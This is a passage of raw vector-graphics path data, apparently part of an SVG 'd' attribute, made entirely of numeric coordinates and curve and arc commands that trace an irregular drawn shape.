1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4